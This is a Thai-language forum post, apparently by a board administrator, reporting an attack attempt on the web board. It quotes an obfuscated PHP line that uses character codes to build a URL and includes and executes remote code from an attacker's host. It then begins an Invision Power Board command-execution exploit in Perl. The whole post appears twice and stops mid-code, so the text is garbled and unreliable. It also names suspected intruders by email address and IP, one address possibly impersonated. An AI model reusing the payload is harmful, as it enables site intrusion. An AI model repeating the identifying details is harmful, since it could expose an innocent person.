asylu3
24-11-2006, 01:48 PM
เมื่อวาน (24/11/2006) ผมยุ่งมากไม่ได้เข้าเว็บตอนดึก มาตอนเช้าเห็นข้อความแปลกๆแบบนี้ Post เต็มไปหมด
r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr
(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr
(117).chr(47).chr(114).chr(53).chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr
(99).chr(46).chr(116).chr(120).chr(116))); //
จากการตรวจสอบแล้วเป็นการ Post ที่มาจาก Script ที่ใช้ในการโจมตีเว็บบอร์ด
ซึ่ง Script ที่ใช้คือด้านล่างนี้
แต่อย่างไรก็ตาม Intruder ที่ใช้ชื่อสมาชิกว่่า h4ckm3, win32 ได้มองข้ามอะไรไปหลายอย่างทำให้ไม่สามารถโจมตีได้สำเร็จ
จากการตรวจสอบข้อมูลคาดว่าอาจจะมีตั้งแต่ 1 - 2 คน โดยทั้งสองใช้ Email ดังนี้
้้
h4ck5h4d0w@gmail.com
somsak@hotmail.com <----- อาจจะไม่ใช่ของเจ้าตัวจริงๆ อาจจะแอบอ้างมาก็ได้
แต่ถ้าใช่่จากการสืบค้นข้อมูลแล้วคิดว่าสามารถวิเคราะห์ตัวบุคคลได้ไม่ยาก
http://www.google.co.uk/search?hl=en&q...l.com&meta= (http://www.google.co.uk/search?hl=en&q=somsak@hotmail.com&meta=)
IP 61.90.220.86 ที่้ใช้ทราบว่ามาจาก True
ถ้าหากคุณเป็นสมาชิกดังกล่าวที่ได้กระทำการข้่างต้นเราขอแจ้งว่าการกระำทำดังกล่าวไม่ได้
เล็ดรอดจากสายตาเรา ในเบื่องต้นนี้ทางเรากำลังพยายามแกะรอยอยู่คิดว่าหากเกิดขึ้นอีกคงจะระบุอะัไรได้ชัดเจนมากขึ้น
หากมีความคืบหน้าจะรายงานให้สมาชิกได้ทราบอีกครั้ง
[hide=20]
[code]#!/usr/bin/perl
## Invision Power Board 2.* commands execution exploit by RST/GHC
## vulnerable versions <= 2.1.5
## tested on 2.1.4, 2.0.2
##
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
use IO::Socket;
use Getopt::Std;
getopts("l:h:p:d:f:v:");
$host
r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr
(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr
(117).chr(47).chr(114).chr(53).chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr
(99).chr(46).chr(116).chr(120).chr(116))); //
จากการตรวจสอบแล้วเป็นการ Post ที่มาจาก Script ที่ใช้ในการโจมตีเว็บบอร์ด
ซึ่ง Script ที่ใช้คือด้านล่างนี้
แต่อย่างไรก็ตาม Intruder ที่ใช้ชื่อสมาชิกว่่า h4ckm3, win32 ได้มองข้ามอะไรไปหลายอย่างทำให้ไม่สามารถโจมตีได้สำเร็จ
จากการตรวจสอบข้อมูลคาดว่าอาจจะมีตั้งแต่ 1 - 2 คน โดยทั้งสองใช้ Email ดังนี้
้้
h4ck5h4d0w@gmail.com
somsak@hotmail.com <----- อาจจะไม่ใช่ของเจ้าตัวจริงๆ อาจจะแอบอ้างมาก็ได้
แต่ถ้าใช่่จากการสืบค้นข้อมูลแล้วคิดว่าสามารถวิเคราะห์ตัวบุคคลได้ไม่ยาก
http://www.google.co.uk/search?hl=en&q...l.com&meta= (http://www.google.co.uk/search?hl=en&q=somsak@hotmail.com&meta=)
IP 61.90.220.86 ที่้ใช้ทราบว่ามาจาก True
ถ้าหากคุณเป็นสมาชิกดังกล่าวที่ได้กระทำการข้่างต้นเราขอแจ้งว่าการกระำทำดังกล่าวไม่ได้
เล็ดรอดจากสายตาเรา ในเบื่องต้นนี้ทางเรากำลังพยายามแกะรอยอยู่คิดว่าหากเกิดขึ้นอีกคงจะระบุอะัไรได้ชัดเจนมากขึ้น
หากมีความคืบหน้าจะรายงานให้สมาชิกได้ทราบอีกครั้ง
[hide=20]
[code]#!/usr/bin/perl
## Invision Power Board 2.* commands execution exploit by RST/GHC
## vulnerable versions <= 2.1.5
## tested on 2.1.4, 2.0.2
##
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
use IO::Socket;
use Getopt::Std;
getopts("l:h:p:d:f:v:");
$host